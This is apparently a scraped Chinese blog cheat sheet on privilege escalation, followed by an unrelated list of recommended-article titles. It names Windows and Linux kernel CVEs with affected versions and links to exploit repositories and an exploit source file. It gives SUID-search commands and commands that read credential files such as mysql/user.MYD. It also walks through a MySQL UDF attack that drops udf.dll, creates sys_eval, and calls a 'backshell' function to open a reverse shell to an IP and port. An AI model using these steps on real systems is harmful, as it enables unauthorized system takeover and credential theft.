工具提权

https://github.com/SecWiki/linux-kernel-exploits

提权CVE

https://github.com/nixawk/labs

操作系统提权-Windows

LPK提权  - 工具 lpk sethc v4.0.exe

ms11-080 -XP/2003

ms14-002 - XP/2003

ms14-068 - 域提权

ms-15-010 - CVE-2015-0003 - Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP

ms15-051 CVE-2015-1701 - 2003/Vista/Server 2008/Windows 7/2008 R2/Windows 8 和 Windows 8.1/Windows Server 2012 和 Windows Server 2012 R2/Windows RT 和 Windows RT 8.1
ms15-077  -  2003/Vista/erver 2008/Windows 7/Server 2008 R2/Windows 8 和 Windows 8.1/Windows Server 2012 和 Windows Server 2012 R2/Windows RT 和 Windows RT 8.1

ms16-016 -  Windows Vista SP2  Windows Server 2008 x86 & x64  Windows Server 2008 R2 x64  Windows 7 x86 & x64   Windows 8.1 x86 & x64


  ms16-032 - CVE-2016-0099 - Vista/ 2008/7/2008 R2/8.1/2012/2012R2/RT 8.1/10

  攻击者首先必须登录系统



CVE-2019-1132
前置条件:登录权限

BypassUAC工具  UACME、Bypass-UAC、Yamabiko

windows内核漏洞提权   

 

服务提权  数据库服务

 

WINDOWS错误系统配置提权

 

系统服务的错误权限配置漏洞提权

 

不安全的注册表权限配置提权

 

不安全的文件/文件夹权限配置提权

 

计划任务提权

 

任意用户以NT AUTHORITY\SYSTEM权限安装msi提权

CVE提权 比对漏洞库/补丁库 https://github.com/GDSSecurity/Windows-Exploit-Suggester/
https://github.com/SecWiki/windows-kernel-exploits

msf模块

软件漏洞提权 - Serv-U

常用端口 - 43958

软件漏洞提权 - radmin

端口 - 4899 - 破解注册表提权

软件漏洞提权 - vnc

常用端口 - 5900

操作系统提权 - Ubuntu

CVE-2019-7304

 1 影响范围/条件:
 2
 3 Ubuntu 18.10
 4
 5 Ubuntu 18.04 LTS
 6
 7 Ubuntu 16.04 LTS
 8
 9 Ubuntu 14.04 LTS
10
11 2.28 < snapd < 2.37

View Code

Linux Kernel Version 4.14-4.4

EXP:

1 http://cyseclabs.com/exploits/upstream44.c

View Code

Linux内核版本提权 

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)    overlayfs(cve:2015-1328)
Linux Kernel 4.3.3 (Ubuntu 14.04/15.10)    overlayfs(cve:2015-8660)
Linux Kernel 4.3.3    overlayfs(cve:2015-8660)

Linux内核溢出提权

https://github.com/SecWiki/linux-kernel-exploits

SUID提权

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

系统服务的错误权限配置漏洞提权

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

操作系统提权-Linux

Linux Kernel < 5.1.17 本地提权漏洞 - SSV-98033

提权检测工具

unix-privesc-check  --适用与Unix/Linux

数据库提权-Mysql - Windows

利用mof提权
UDF提权
端口反弹提权
LPK劫持提权:
启动项提权:
工具提权
sqlmap直连数据库提权
msfudf提权
UDF #对于Windows2008以下服务器比较适用,主要针对Windows2000、Windows2003前置条件:1.拥有webshell2.在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导入到相应路径    3.账号拥有insert和delete权限      若mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/      若mysql版本 > 5.2 ,UDF导出到安装路径MySQL\Lib\Plugin\$ gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.somysql> show variables like '%plugin%';mysql> create function sys_eval returns string soname 'mysqludf.so';mysql> select sys_eval('whoami');mysql> drop function sys_eval;select * from mysql.user where user=substring_index(user(),'@',1);  前置条件:    无Webshell #通过查询将udf.dll转成代码插入数据库,然后导出(代码为select hex(load_file('/udf.dll'))中的内容)      use mysql;       set @a=concat('',0x代码);       create table Ghost(data LONGBLOB);       insert into Ghost values("");update Ghost set data = @a;       select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/udf.dll'; #导出ufd.dll       CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll'; #创建函数       select backshell("192.168.40.135",4444); 

反弹端口提权 #主要针对Webshell无效时使用

 MOF方法提权

  运行MOF文件指定为命令行参数将Mofcomp.exe文件

  使用IMofCompiler接口和$CompileFile方法

  拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件

工具相关 # Python_FuckMySQL

数据库提权-mssql 

sa提权- web.config

转载于:https://www.cnblogs.com/AtesetEnginner/p/11194756.html

应用安全-提权/降权相关整理相关推荐

  1. C/C++ 进程代码注入与提权/降权

    如果将shellcode注入到具有特定权限的进程中,我们就可以获得与该进程相同的权限,此方法可以用于提权与降权操作,注入有多种方式,最简单的是直接将metasploit生成的有效载荷直接注入到目标进程 ...

  2. 渗透技巧——程序的降权启动

    本文讲的是渗透技巧--程序的降权启动, 0x00 前言 在渗透测试中,常常会遇到需要改变程序启动权限(分为提权和降权)的情况. 提权包含从普通用户权限到管理员权限和从管理员权限到system权限,而渗 ...

  3. 网站降权根服务器有关系吗,实例讲述更换服务器后导致网站降权的解决方法

    8元一个月的服务器已经用了小半年了,实在经不住现在的流量冲击.因服务器问题,用户打开我的网站经常出现502错误,无奈只有更换服务器,由于服务器更换时没有处理好,导致网站被降权了.接下来的SEO干货来了 ...

  4. 湖南网络推广浅谈网站首页降权怎么办?

    对于湖南网络推广的站长来说,提高网站排名是大家进行网站维护的最终目的,能有善始善终就很不错了,但在网站优化的过程中,就难免会出现网站首页降权的时候,那么对于首页降权了又该如何恢复呢?下面湖南网络推广就 ...

  5. 网站降权不必慌 扭转乾坤有绝招

    "一夜过后,网站排名全没了,天呐,这是怎么回事?" "昨天5个主关键词还排在第一页,今早突然没了?这是怎么了" "网站关键词没了,老板怒了,工作不保了 ...

  6. 通过token窃取实现降权或者提权

    文章目录 前言 通过msf实现 1.生成木马并以管理员权限运行 2.实现提权到system 3.降级到普通用户 通过incognito工具实现 1. 实现提权到system 2. 降权到普通user ...

  7. 【Android 逆向】Android 权限 ( adb 降权相关的属性 | ro.secure 属性 | ro.debuggable 属性 | service.adb.root 属性 )

    文章目录 一.adb 降权 1.ro.secure 属性 2.ro.debuggable 属性 3.service.adb.root 属性 4.ro.kernel.qemu 属性 一.adb 降权 远 ...

  8. 『昆明SEO』网站被降权的常见问题有些呢?

    网站被降权,都有哪些问题?该如何解决呢?网站本来好好的在成长,突然有一天排名全掉了,我相信是每一位ser不想遇到的情况!辛辛苦苦的付出没有收到应有的报答和待遇,心里肯定很蓝瘦的.接下来SEO技巧网分享 ...

  9. 湖南网络推广教大家如何“挽回”网站被降权的排名和权重?

    很多时候,湖南网络推广表示,可能因为一些操作错误或者细节问题没把控好,或是被K了,好好的网站就突然降权了,让站长们都很猝不及防.那么针对这种情况,该如何挽回网站的排名和权重呢?下面湖南网络推广就带大家 ...

最新文章

  1. 快速入门 TensorFlow2 模型部署
  2. 作为Java程序员,这些开源工具你应该要学习!
  3. java反应器构型,反应器结构及工作原理现用图解.doc
  4. mysql外键约束脚本_使用SQL脚本创建数据库,操作主键、外键与各种约束(MS SQL Server)...
  5. 武器系统仿真技术(二):末端制导系统蒙特卡洛仿真法
  6. 用C语言程序进行比赛日程排列
  7. 【Oracle】并行等待之PX Deq: Table Q Normal
  8. Windows10家庭版 Windows defender 安全中心显示 页面不可用
  9. 攻防演练中防守方的防护措施.
  10. 一键式免费借还的智能充电宝租赁
  11. phpcmsV9 全站搜索功能如何实现
  12. 小白怎么快速入门游戏建模软件C4D?
  13. 用计算机录入稿件,如何利用OCR文字识别软件快速录入信息到电脑上?
  14. 国家测绘局公布2007年十大测绘违法典型案件(转)
  15. 2022-04-13 工作记录--LayUI-动态渲染数据表格的表头参数
  16. 【AutoSAR】【ComM】通信管理
  17. 人工智能导论学习笔记(教材王万良《人工智能导论》(第四版)高等教育出版社 )
  18. Mate Translate for Mac(翻译软件) V6.0.0中文破解版
  19. android手机彻底变砖拯救
  20. 测试开发工程师成长日记004 - linux常用命令day01

热门文章

  1. “那不勒斯”服务器芯片,32核/64超线程:AMD 公开 Naples “那不勒斯” 部分规格和性能...
  2. 超强!MDETR:基于Transformer的端到端目标检测神器!开源!
  3. 【资源下载】866页《计算机视觉:原理,算法,应用,学习》最新第五版-附下载
  4. 复练-软考网规-虚拟化专题
  5. python写剧情文字游戏_文字游戏引擎试用心得之一:Ren'py 和 Fungus
  6. java中判断undefined_Java虚拟机系列一:一文搞懂 JVM 架构和运行时数据区
  7. configure: error: zlib library not found
  8. ajax 获取openid,纯前端获取当前用户的openid(微信小程序)
  9. python十点半游戏代码_十点半游戏完整代码及详细注释.py
  10. java基本语法心得_Java学习笔记(一)——基础语法(上)